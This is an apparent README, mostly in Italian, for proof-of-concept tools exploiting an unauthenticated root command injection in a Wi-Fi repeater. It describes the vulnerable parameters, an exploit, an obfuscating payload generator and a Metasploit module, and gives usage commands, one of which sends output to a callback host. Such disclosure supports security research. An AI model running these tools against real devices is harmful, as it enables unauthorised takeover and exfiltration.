
PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.
[!WARNING] Questo codice è fornito COSÌ COM'È solo a scopo didattico e di ricerca. Non utilizzare questo PoC su sistemi di produzione, ambienti condivisi o target non autorizzati.
- L'esecuzione o l'hosting di questo codice può attivare rilevamenti antivirus, avvisi di monitoraggio della sicurezza o conseguenze legali in caso di uso improprio.
- Gli autori e i manutentori del repository declinano ogni responsabilità per danni, usi impropri o attività illegali derivanti da questo codice.
- Da utilizzare esclusivamente in ambienti di laboratorio isolati con la dovuta autorizzazione. Destinato esclusivamente alla ricerca difensiva, all'analisi delle vulnerabilità e ai test blue-team.
Esiste una vulnerabilità di iniezione di comandi del sistema operativo non autenticata nel gestore smacfilter_conf. I parametri GET name, enable e mac vengono passati senza sanificazione a una chiamata sprintf() che costruisce comandi UCI eseguiti come root.
poc.py - Exploit completo con supporto HTTPS, tentativi ripetuti, timeout ed esfiltrazione tramite callback.val.py - Validatore di vulnerabilità sicuro e passivo (usa il comando innocuo id).gen.py - Generatore di payload avanzato con molteplici tecniche di offuscamento.MITIGATIONS.md - Misure difensive raccomandate.exploit/.pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
Stelle e contributi sono benvenuti - in particolare miglioramenti per bypass o varianti firmware aggiuntive.